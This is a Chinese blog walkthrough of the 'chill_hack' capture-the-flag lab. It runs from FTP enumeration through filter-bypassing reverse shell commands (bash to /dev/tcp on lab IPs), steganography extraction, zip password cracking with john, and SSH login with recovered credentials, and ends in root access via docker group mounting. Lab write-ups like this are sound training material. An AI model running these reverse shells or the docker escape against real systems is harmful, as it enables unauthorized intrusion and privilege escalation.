当前位置: 首页 > news >正文

chill_hack靶机攻略

chill_hack靶机攻略

扫描

image-20231030210321452

image-20231030210331814

渗透

ftp开放,提示ftp连接

连接过后发现一个文本文件

下载下来

ftp 10.4.7.155
ftp
ftp
dir
get note.txt

image-20231030210308826

查看内容

image-20231030210456604

此处可以知道两个用户名,并且提示命令被过滤

bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.4.7.132/8888 0>&1'
bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.4.7.138/12138 0>&1'

提权

使用sudo -l

发现可以以appar身份执行.sh文件

image-20231030214921904

image-20231030215018127

看代码感觉没什么用

在/var/www/files中发现hacker.php

查看源码

两行提示可能有图片隐写

image-20231030215623251

靶机开启pythonweb服务

image-20231030215822449

使用工具

steghide extract -sf hacker-with-laptop_23-2147985341.jpg

发现有个压缩包,但是解压需要密码

zip2john backup.zip > backup.john
# 将名为 backup.zip 的 ZIP 文件的密码哈希提取出来,并将结果保存到名为 backup.john 的文件中
john --wordlist=/usr/share/wordlists/rockyou.txt backup.john 

image-20231030220459149

pass1word

image-20231030220544113

查看一下解压出来的东西

发现密文

image-20231030220749247

IWQwbnRLbjB3bVlwQHNzdzByZA==
#base64解码
!d0ntKn0wmYp@ssw0rd

家目录下可以看到有三个用户,挨个尝试ssh登录,发现只有anurodh可以登录

anurodh:!d0ntKn0wmYp@ssw0rd

image-20231030221114757

id发现该用户在docker组内

怀疑在docker里

查看该文件,确认一下是不是在docker里

image-20231030222607471

发现就是在docker里

查看docker镜像

docker images

提权

docker run -it -v /root:/mnt alpine

image-20231030223032891

相关文章:

  • 京东平台数据分析:2023年9月京东空气净化器行业品牌销售排行榜
  • 轻量级 IDE 文本编辑器 Geany 发布 2.0
  • linux-vsftp虚拟多用户
  • JSON和Protobuf序列化
  • JMeter的使用——傻瓜式学习【中】
  • 公网IP与内网穿透与端口映射区别
  • ES6带来那些js新特性?
  • vscode在新窗口打开文件夹
  • 在win10下,使用torchviz对深度学习网络模型进行可视化
  • 计算机网络基础二
  • 3.7每日一题(凑微分求不定积分)
  • FFmpeg系列索引
  • SQL-正则表达式和约束
  • LeetCode--511. 游戏玩法分析 I
  • 工作中的小tips:如何快速提取图片或者pdf上的文字,进行编辑?
  • JavaScript 如何正确处理 Unicode 编码问题!
  • [译] 理解数组在 PHP 内部的实现(给PHP开发者的PHP源码-第四部分)
  • 【vuex入门系列02】mutation接收单个参数和多个参数
  • 11111111
  • Android Volley源码解析
  • HTTP中的ETag在移动客户端的应用
  • JavaScript设计模式系列一:工厂模式
  • java多线程
  • JS字符串转数字方法总结
  • JWT究竟是什么呢?
  • mysql 5.6 原生Online DDL解析
  • Redis字符串类型内部编码剖析
  • SAP云平台里Global Account和Sub Account的关系
  • 从0实现一个tiny react(三)生命周期
  • 动态规划入门(以爬楼梯为例)
  • 简单数学运算程序(不定期更新)
  • 七牛云 DV OV EV SSL 证书上线,限时折扣低至 6.75 折!
  • 前端技术周刊 2019-01-14:客户端存储
  • 前嗅ForeSpider中数据浏览界面介绍
  • 职业生涯 一个六年开发经验的女程序员的心声。
  • ​软考-高级-系统架构设计师教程(清华第2版)【第12章 信息系统架构设计理论与实践(P420~465)-思维导图】​
  • !!【OpenCV学习】计算两幅图像的重叠区域
  • #pragam once 和 #ifndef 预编译头
  • #QT项目实战(天气预报)
  • #我与Java虚拟机的故事#连载06:收获颇多的经典之作
  • #我与Java虚拟机的故事#连载15:完整阅读的第一本技术书籍
  • (C#)Windows Shell 外壳编程系列4 - 上下文菜单(iContextMenu)(二)嵌入菜单和执行命令...
  • (C语言)共用体union的用法举例
  • (pojstep1.1.1)poj 1298(直叙式模拟)
  • (Repost) Getting Genode with TrustZone on the i.MX
  • (二)JAVA使用POI操作excel
  • (附源码)ssm高校运动会管理系统 毕业设计 020419
  • (论文阅读23/100)Hierarchical Convolutional Features for Visual Tracking
  • (学习日记)2024.01.09
  • (一)80c52学习之旅-起始篇
  • (原创)Stanford Machine Learning (by Andrew NG) --- (week 9) Anomaly DetectionRecommender Systems...
  • (最优化理论与方法)第二章最优化所需基础知识-第三节:重要凸集举例
  • .helper勒索病毒的最新威胁:如何恢复您的数据?
  • .NET Core 2.1路线图
  • .NET DataGridView数据绑定说明